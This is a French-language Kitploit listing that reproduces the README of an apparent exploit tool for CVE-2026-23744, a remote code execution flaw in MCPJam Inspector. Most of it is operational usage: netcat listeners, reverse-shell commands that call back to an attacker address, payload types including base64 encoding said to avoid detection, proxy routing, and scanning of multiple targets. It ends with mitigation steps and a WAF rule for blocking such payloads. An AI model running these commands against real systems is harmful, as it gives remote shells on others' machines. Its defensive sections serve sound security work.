Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744-MCPJam-Exploit — Une preuve de concept d'exploitation pour CVE-2026-23744 - vulnérabilité d'exécution de code à distance (RCE) dans MCPJam Inspector. Cet outil démontre la faille de sécurité dans les versions <=1.4.2 et aide les chercheurs en sécurité à vérifier les correctifs. Uniquement à des fins de tests autorisés et d'éducation. Inclut plusieurs options de payload, l'exécution de commandes et la gestion de session. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

Voir le dépôt
714il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Une preuve de concept d'exploitation pour CVE-2026-23744 - vulnérabilité d'exécution de code à distance (RCE) dans MCPJam Inspector. Cet outil démontre la faille de sécurité dans les versions <=1.4.2 et aide les chercheurs en sécurité à vérifier les correctifs. Uniquement à des fins de tests autorisés et d'éducation. Inclut plusieurs options de payload, l'exécution de commandes et la gestion de session.

Partager

CVE-2026-23744 Exploit RCE MCPJam Inspector

Security Research Python 3.7+ Version Author


⚠️ AVERTISSEMENT

Cet outil est destiné UNIQUEMENT aux tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée est illégale. Les utilisateurs assument l'entière responsabilité de leurs actions.


📋 Aperçu

Ce dépôt contient un exploit de proof-of-concept pour CVE-2026-23744, une vulnérabilité d'exécution de code à distance (RCE) non authentifiée trouvée dans les versions <=1.4.2 de MCPJam Inspector. La vulnérabilité a un score CVSS critique de 9,8, indiquant un risque sévère avec un vecteur d'attaque réseau.

AttributDétails
CVE IDCVE-2026-23744
VulnérabilitéExécution de code à distance non authentifiée
Versions affectées<=1.4.2
Score CVSS9,8 (Critique)
Vecteur d'attaqueRéseau

📸 Captures d'écran

ex

🚀 Fonctionnalités

L'outil d'exploit offre un ensemble complet de fonctionnalités conçues pour des tests de sécurité efficaces :

  • Support multi-payload : Comprend des charges utiles Bash, Python, Netcat, Perl, PHP et Base64.
  • Exécution de commandes : Exécute des commandes sur le système cible avec capture de sortie.
  • Scan de cibles : Scanne plusieurs cibles avec limitation de débit configurable.
  • Gestion de session : Gestion de session persistante pour des tests continus.
  • Support proxy : Intégration avec des proxys pour un trafic anonyme ou routé.
  • Empreinte de cible : Identifie les caractéristiques du système cible.
  • Configuration automatique d'écouteur : Configure automatiquement les écouteurs pour les shells inversés.

📦 Installation

Pour configurer l'outil d'exploit, suivez ces étapes :

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. Installez les dépendances :

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 Exemples d'utilisation

Exploitation de base

Pour lancer un exploit de base, configurez d'abord un écouteur, puis exécutez le script d'exploit :

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

Exécution de commandes

Exécutez des commandes uniques ou des commandes depuis un fichier :

root@kitploit:~
# Execute single command
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Execute commands from file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

Différentes charges utiles

Utilisez différents types de charges utiles pour différents scénarios :

root@kitploit:~
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64 encoded payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

Scan de cibles

Scannez plusieurs cibles pour détecter la vulnérabilité :

root@kitploit:~
# Create targets file
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Scan for vulnerable targets
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

Options avancées

Explorez les fonctionnalités avancées telles que l'empreinte, l'utilisation de proxy, le mode verbeux et la configuration automatique de l'écouteur :

root@kitploit:~
# With fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# With proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Verbose mode
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Auto-listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 Types de charges utiles

TypeCommandeIdéal pour
bashBash reverse shellLa plupart des systèmes Linux
pythonPython3 reverse shellSystèmes avec Python installé
ncNetcat reverse shellSystèmes avec netcat
perlPerl reverse shellSystèmes avec Perl installé
phpPHP reverse shellSystèmes avec PHP installé
base64Base64 encodedÉviter la détection

📊 Example Output

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ Atténuation

Actions immédiates

Pour se protéger contre CVE-2026-23744, il est crucial de prendre les mesures immédiates suivantes :

  • Mettez à niveau MCPJam Inspector vers la version >1.4.2.
  • Isolez les systèmes vulnérables du réseau.
  • Surveillez les requêtes POST suspectes vers /api/mcp/connect.
  • Implémentez des règles de pare-feu d'application Web (WAF) pour bloquer les schémas malveillants.

Exemple de règle WAF

Exemple de règle Nginx WAF pour bloquer les schémas malveillants courants :

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ FAQ

Q : Est-ce légal à utiliser ?

R : Cet outil n'est légal que sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester.

Q : Quels systèmes sont vulnérables ?

R : Les versions <=1.4.2 de MCPJam Inspector sont vulnérables.

Q : Comment protéger mes systèmes ?

R : Mettez à niveau immédiatement vers la version >1.4.2 de MCPJam Inspector.


📚 Références

  • CVE-2026-23744 MITRE

👤 Auteur

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 Journal des modifications

Version 2.0 (14 juillet 2026)

  • ✅ Correction de la fiabilité de la vérification de l'écouteur
  • ✅ Implémentation du mode d'exécution de commandes
  • ✅ Ajout de l'empreinte de cible
  • ✅ Amélioration de la gestion de session
  • ✅ Ajout de solutions de repli pour les charges utiles

Version 1.0 (10 juillet 2026)

  • ✅ Version initiale

⚠️ Avertissement final

L'utilisation non autorisée de cet outil est illégale et peut entraîner de graves conséquences, notamment :

  • Poursuites pénales
  • Poursuites civiles
  • Casier judiciaire permanent
  • Sanctions professionnelles

Fait avec ❤️ par Sudeepa Wanigarathna

Télécharger l’outil